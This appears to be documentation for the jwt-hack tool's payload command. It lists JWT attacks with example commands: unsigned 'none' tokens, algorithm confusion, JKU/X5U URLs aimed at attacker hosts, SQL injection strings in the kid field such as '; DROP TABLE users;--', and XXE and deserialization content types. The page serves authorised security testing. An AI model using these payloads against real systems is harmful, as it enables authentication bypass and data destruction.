jwt-hack 2.5.0

Hack the JWT (JSON Web Token) - A tool for JWT security testing and token manipulation
Documentation 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267

+++
title = "Payload Command"
weight = 5
+++

The `payload` command generates various JWT attack payloads for security testing and vulnerability assessment.

## Basic Usage

```bash
jwt-hack payload <TOKEN> [OPTIONS]
```

## Attack Payload Types

### None Algorithm Attack

Remove signature verification requirement:

```bash
jwt-hack payload <TOKEN> --target=none
```

Generates payloads with:
- `alg: "none"` (lowercase)
- `alg: "None"` (capitalized)
- `alg: "NONE"` (uppercase)
- Various case combinations

### Algorithm Confusion Attack

Convert RSA tokens to HMAC using public key as secret:

```bash
jwt-hack payload <RSA_TOKEN> --target=alg_confusion
```

Creates payloads that:
- Change algorithm from RS256 to HS256
- Use public key content as HMAC secret
- Test algorithm substitution vulnerabilities

### JKU/X5U URL Attacks

Manipulate JSON Web Key URLs:

```bash
# Basic JKU/X5U attack
jwt-hack payload <TOKEN> --target=jku

# With trusted domain bypass
jwt-hack payload <TOKEN> --jwk-trust=trusted.com --jwk-attack=evil.com

# Custom protocol and attack domain
jwt-hack payload <TOKEN> --jwk-attack=attacker.com --jwk-protocol=http
```

Generates payloads with:
- Malicious JKU URLs pointing to attacker-controlled keys
- X5U URLs for certificate chain manipulation
- Domain bypass techniques
- Protocol downgrade attacks

### KID SQL Injection

Inject SQL payloads in Key ID field:

```bash
jwt-hack payload <TOKEN> --target=kid_sql
```

Generates payloads with SQL injection vectors:
- `' OR 1=1--`
- `'; DROP TABLE users;--`
- `' UNION SELECT null--`
- Time-based blind SQL injection payloads

### X5C Certificate Injection

Inject malicious certificate chains:

```bash
jwt-hack payload <TOKEN> --target=x5c
```

Creates payloads with:
- Malicious certificate chains
- Self-signed certificates
- Certificate with custom extensions
- Chain validation bypass attempts

### CTY Content Type Attacks

Manipulate content type headers for XXE and deserialization:

```bash
jwt-hack payload <TOKEN> --target=cty
```

Generates payloads with content types for:
- `text/xml` - XML External Entity (XXE) attacks
- `application/xml` - XML processing vulnerabilities
- `application/x-java-serialized-object` - Java deserialization
- `application/json+x-jackson-smile` - Jackson deserialization

## Generate All Payload Types

Create comprehensive attack payload set:

```bash
# Generate all attack types
jwt-hack payload <TOKEN> --target=all

# All attacks with custom domains
jwt-hack payload <TOKEN> --target=all --jwk-attack=evil.com --jwk-trust=trusted.com
```

## Command Options

### Required
- `<TOKEN>` - Base JWT token for payload generation

### Target Selection
- `--target <TYPE>` - Payload types: `all`, `none`, `jku`, `x5u`, `alg_confusion`, `kid_sql`, `x5c`, `cty`

### JKU/X5U Attack Options
- `--jwk-trust <DOMAIN>` - Trusted domain for bypass techniques
- `--jwk-attack <DOMAIN>` - Attacker-controlled domain
- `--jwk-protocol <PROTOCOL>` - Protocol to use (http/https, default: https)

## Output Format

Payloads are displayed with:
- Attack type identifier
- Modified JWT token
- Description of the attack vector
- Usage recommendations

Example output:
```
🎯 None Algorithm Attack Payloads:

[1] None Algorithm (lowercase)
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0In0.

[2] None Algorithm (capitalized)
eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0In0.

[3] None Algorithm (uppercase)
eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxMjM0In0.
```

## Attack Scenarios

### Testing Authentication Bypass
```bash
# Test if application accepts unsigned tokens
jwt-hack payload <TOKEN> --target=none

# Test each generated payload:
curl -H "Authorization: Bearer <NONE_PAYLOAD>" https://api.example.com/user
```

### Algorithm Confusion Testing
```bash
# Generate algorithm confusion payloads
jwt-hack payload <RSA_TOKEN> --target=alg_confusion

# Test with public key content as HMAC secret
curl -H "Authorization: Bearer <CONFUSED_PAYLOAD>" https://api.example.com/admin
```

### Key URL Manipulation
```bash
# Test JKU/X5U URL attacks
jwt-hack payload <TOKEN> --target=jku --jwk-attack=attacker.com

# Host malicious JWK at attacker.com/keys.json
# Test if application fetches keys from attacker URL
```

### SQL Injection in KID
```bash
# Generate KID SQL injection payloads
jwt-hack payload <TOKEN> --target=kid_sql

# Test each payload for SQL injection responses
# Monitor application logs for SQL errors
```

## Security Testing Workflow

### 1. Reconnaissance
```bash
# Decode token to understand structure
jwt-hack decode <TOKEN>

# Generate comprehensive payload set
jwt-hack payload <TOKEN> --target=all
```

### 2. Systematic Testing
```bash
# Test none algorithm bypasses
jwt-hack payload <TOKEN> --target=none

# Test each payload systematically
# Document responses and behaviors
```

### 3. Advanced Attacks
```bash
# Algorithm confusion (if RSA token)
jwt-hack payload <RSA_TOKEN> --target=alg_confusion

# URL manipulation attacks
jwt-hack payload <TOKEN> --target=jku --jwk-attack=controlled-domain.com
```

## Payload Customization

### Custom Domains
```bash
# Use specific attack domains
jwt-hack payload <TOKEN> --target=jku --jwk-attack=evil.hacker.com

# Bypass domain restrictions
jwt-hack payload <TOKEN> --target=x5u --jwk-trust=trusted.com --jwk-attack=evil.com
```

### Protocol Selection
```bash
# Force HTTP for testing
jwt-hack payload <TOKEN> --target=jku --jwk-protocol=http --jwk-attack=attacker.com

# Test protocol downgrade vulnerabilities
```

## Integration with Testing Frameworks

### Burp Suite Integration
1. Generate payloads with JWT-HACK
2. Import into Burp Intruder
3. Use as payload list for systematic testing

### Custom Scripts
```bash
# Generate and test programmatically
jwt-hack payload <TOKEN> --target=all > payloads.txt

# Process payloads in custom testing script
while read payload; do
    test_jwt_payload "$payload"
done < payloads.txt
```

## Best Practices

### Responsible Testing
- Only test applications you own or have permission to test
- Document all findings appropriately
- Follow responsible disclosure practices

### Comprehensive Coverage
- Test all payload types systematically
- Combine with other testing techniques
- Verify results manually when automated tools indicate vulnerabilities